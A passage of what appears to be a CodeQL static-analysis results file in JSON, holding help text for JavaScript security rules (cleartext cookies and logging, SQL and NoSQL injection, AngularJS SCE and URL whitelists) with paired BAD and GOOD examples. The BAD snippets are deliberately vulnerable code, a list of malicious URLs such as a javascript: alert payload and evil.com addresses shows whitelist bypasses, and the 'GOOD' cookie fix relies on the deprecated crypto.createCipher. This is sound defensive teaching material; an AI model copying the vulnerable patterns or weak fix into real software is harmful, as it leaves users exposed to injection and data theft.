LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", - "markdown" : "# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // BAD: Setting a cookie value with cleartext sensitive data.\n res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n password = getPassword();\n\nfunction encrypt(text){\n var cipher = crypto.createCipher('aes-256-ctr', password);\n return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n let pw = req.param(\"current_password\");\n // GOOD: Encoding the value before setting it.\n res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-315", "external/cwe/cwe-359" ], - "description" : "Sensitive information stored without encryption or hashing can expose it to an\n attacker.", - "id" : "js/clear-text-storage-of-sensitive-data", - "kind" : "path-problem", - "name" : "Clear text storage of sensitive information", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/clear-text-logging", - "name" : "js/clear-text-logging", - "shortDescription" : { - "text" : "Clear-text logging of sensitive information" - }, - "fullDescription" : { - "text" : "Logging sensitive information without encryption or hashing can expose it to an attacker." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${process.env}`);\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${not_sensitive_data}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n", - "markdown" : "# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${process.env}`);\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${not_sensitive_data}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-359", "external/cwe/cwe-532" ], - "description" : "Logging sensitive information without encryption or hashing can\n expose it to an attacker.", - "id" : "js/clear-text-logging", - "kind" : "path-problem", - "name" : "Clear-text logging of sensitive information", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/build-artifact-leak", - "name" : "js/build-artifact-leak", - "shortDescription" : { - "text" : "Storage of sensitive information in build artifact" - }, - "fullDescription" : { - "text" : "Including sensitive information in a build artifact can expose it to an attacker." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n \"process.env\": JSON.stringify(process.env)\n })\n ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n })\n ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", - "markdown" : "# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n \"process.env\": JSON.stringify(process.env)\n })\n ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n plugins: [\n new webpack.DefinePlugin({\n 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n })\n ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-312", "external/cwe/cwe-315", "external/cwe/cwe-359" ], - "description" : "Including sensitive information in a build artifact can\n expose it to an attacker.", - "id" : "js/build-artifact-leak", - "kind" : "path-problem", - "name" : "Storage of sensitive information in build artifact", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/sql-injection", - "name" : "js/sql-injection", - "shortDescription" : { - "text" : "Database query built from user-controlled sources" - }, - "fullDescription" : { - "text" : "Building a database query from user-controlled sources is vulnerable to insertion of malicious code by the user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Database query built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // BAD: the category might have SQL special characters in it\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n req.params.category +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: use parameters\n var query2 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n pool.query(query2, [req.params.category], function(err, results) {\n // process results\n });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n SqlString = require('sqlstring'),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: the category is escaped using mysql.escape\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n SqlString.escape(req.params.category) +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n \"Todo\",\n new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n\n await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n if (typeof id !== \"string\") {\n res.status(400).json({ status: \"error\" });\n return;\n }\n await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n", - "markdown" : "# Database query built from user-controlled sources\nIf a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n\n## Recommendation\nMost database connector libraries offer a way of safely embedding untrusted data into a query by means of query parameters or prepared statements.\n\nFor NoSQL queries, make use of an operator like MongoDB's `$eq` to ensure that untrusted data is interpreted as a literal value and not as a query object. Alternatively, check that the untrusted data is a literal value and not a query object before using it in a query.\n\nFor SQL queries, use query parameters or prepared statements to embed untrusted data into the query string, or use a library like `sqlstring` to escape untrusted data.\n\n\n## Example\nIn the following example, assume the function `handler` is an HTTP request handler in a web application, whose parameter `req` contains the request object.\n\nThe handler constructs an SQL query string from user input and executes it as a database query using the `pg` library. The user input may contain quote characters, so this code is vulnerable to a SQL injection attack.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // BAD: the category might have SQL special characters in it\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n req.params.category +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\nTo fix this vulnerability, we can use query parameters to embed the user input into the query string. In this example, we use the API offered by the `pg` Postgres database connector library, but other libraries offer similar features. This version is immune to injection attacks.\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: use parameters\n var query2 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE\";\n pool.query(query2, [req.params.category], function(err, results) {\n // process results\n });\n});\n\n```\nAlternatively, we can use a library like `sqlstring` to escape the user input before embedding it into the query string:\n\n\n```javascript\nconst app = require(\"express\")(),\n pg = require(\"pg\"),\n SqlString = require('sqlstring'),\n pool = new pg.Pool(config);\n\napp.get(\"search\", function handler(req, res) {\n // GOOD: the category is escaped using mysql.escape\n var query1 =\n \"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='\" +\n SqlString.escape(req.params.category) +\n \"' ORDER BY PRICE\";\n pool.query(query1, [], function(err, results) {\n // process results\n });\n});\n\n```\n\n## Example\nIn the following example, an express handler attempts to delete a single document from a MongoDB collection. The document to be deleted is identified by its `_id` field, which is constructed from user input. The user input may contain a query object, so this code is vulnerable to a NoSQL injection attack.\n\n\n```javascript\nconst express = require(\"express\");\nconst mongoose = require(\"mongoose\");\nconst Todo = mongoose.model(\n \"Todo\",\n new mongoose.Schema({ text: { type: String } }, { timestamps: true })\n);\n\nconst app = express();\napp.use(express.json());\napp.use(express.urlencoded({ extended: false }));\n\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n\n await Todo.deleteOne({ _id: id }); // BAD: id might be an object with special properties\n\n res.json({ status: \"ok\" });\n});\n\n```\nTo fix this vulnerability, we can use the `$eq` operator to ensure that the user input is interpreted as a literal value and not as a query object:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n await Todo.deleteOne({ _id: { $eq: id } }); // GOOD: using $eq operator for the comparison\n\n res.json({ status: \"ok\" });\n});\n```\nAlternatively check that the user input is a literal value and not a query object before using it:\n\n\n```javascript\napp.delete(\"/api/delete\", async (req, res) => {\n let id = req.body.id;\n if (typeof id !== \"string\") {\n res.status(400).json({ status: \"error\" });\n return;\n }\n await Todo.deleteOne({ _id: id }); // GOOD: id is guaranteed to be a string\n\n res.json({ status: \"ok\" });\n});\n\n```\n\n## References\n* Wikipedia: [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).\n* MongoDB: [$eq operator](https://docs.mongodb.com/manual/reference/operator/query/eq).\n* OWASP: [NoSQL injection](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf).\n* Common Weakness Enumeration: [CWE-89](https://cwe.mitre.org/data/definitions/89.html).\n* Common Weakness Enumeration: [CWE-90](https://cwe.mitre.org/data/definitions/90.html).\n* Common Weakness Enumeration: [CWE-943](https://cwe.mitre.org/data/definitions/943.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-089", "external/cwe/cwe-090", "external/cwe/cwe-943" ], - "description" : "Building a database query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", - "id" : "js/sql-injection", - "kind" : "path-problem", - "name" : "Database query built from user-controlled sources", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/angular/disabling-sce", - "name" : "js/angular/disabling-sce", - "shortDescription" : { - "text" : "Disabling SCE" - }, - "fullDescription" : { - "text" : "Disabling strict contextual escaping (SCE) can cause security vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n .config(function($sceProvider) {\n $sceProvider.enabled(false); // BAD\n }).controller('controller', function($scope) {\n // ...\n $scope.html = '
  • ' + item.toString() + '
';\n });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n .controller('controller', function($scope, $sce) {\n // ...\n // GOOD (but should use the templating system instead)\n $scope.html = $sce.trustAsHtml('
  • ' + item.toString() + '
'); \n });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n .config(function($sceProvider) {\n $sceProvider.enabled(false); // BAD\n }).controller('controller', function($scope) {\n // ...\n $scope.html = '
  • ' + item.toString() + '
';\n });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n .controller('controller', function($scope, $sce) {\n // ...\n // GOOD (but should use the templating system instead)\n $scope.html = $sce.trustAsHtml('
  • ' + item.toString() + '
'); \n });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "maintainability", "frameworks/angularjs", "external/cwe/cwe-116" ], - "description" : "Disabling strict contextual escaping (SCE) can cause security vulnerabilities.", - "id" : "js/angular/disabling-sce", - "kind" : "problem", - "name" : "Disabling SCE", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/angular/double-compilation", - "name" : "js/angular/double-compilation", - "shortDescription" : { - "text" : "Double compilation" - }, - "fullDescription" : { - "text" : "Recompiling an already compiled part of the DOM can lead to unexpected behavior of directives, performance problems, and memory leaks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(element)(scope); // NOT OK\n }\n };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(tooltip)(scope); // OK\n }\n };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n", - "markdown" : "# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(element)(scope); // NOT OK\n }\n };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n .directive('addToolTip', function($compile) {\n return {\n link: function(scope, element, attrs) {\n var tooltip = angular.element('A tooltip');\n tooltip.on('mouseenter mouseleave', function() {\n scope.$apply('showToolTip = !showToolTip');\n });\n element.append(tooltip);\n $compile(tooltip)(scope); // OK\n }\n };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n" - }, - "properties" : { - "tags" : [ "reliability", "frameworks/angularjs", "security", "external/cwe/cwe-1176" ], - "description" : "Recompiling an already compiled part of the DOM can lead to\n unexpected behavior of directives, performance problems, and memory leaks.", - "id" : "js/angular/double-compilation", - "kind" : "problem", - "name" : "Double compilation", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "8.8" - } - }, { - "id" : "js/angular/insecure-url-whitelist", - "name" : "js/angular/insecure-url-whitelist", - "shortDescription" : { - "text" : "Insecure URL whitelist" - }, - "fullDescription" : { - "text" : "URL whitelists that are too permissive can cause security vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n .config(function($sceDelegateProvider) {\n $sceDelegateProvider.resourceUrlWhitelist([\n \"*://example.org/*\", // BAD\n \"https://**.example.com/*\", // BAD\n \"https://example.**\", // BAD\n \"https://example.*\" // BAD\n ]);\n });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n", - "markdown" : "# Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n .config(function($sceDelegateProvider) {\n $sceDelegateProvider.resourceUrlWhitelist([\n \"*://example.org/*\", // BAD\n \"https://**.example.com/*\", // BAD\n \"https://example.**\", // BAD\n \"https://example.*\" // BAD\n ]);\n });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n" - }, - "properties" : { - "tags" : [ "security", "frameworks/angularjs", "external/cwe/cwe-183", "external/cwe/cwe-625" ], - "description" : "URL whitelists that are too permissive can cause security vulnerabilities.", - "id" : "js/angular/insecure-url-whitelist", - "kind" : "problem", - "name" : "Insecure URL whitelist", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/identity-replacement", - "name" : "js/identity-replacement", - "shortDescription" : { - "text" : "Replacement of a substring with itself" - }, - "fullDescription" : { - "text" : "Replacing a substring with itself has no effect and may indicate a mistake." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar 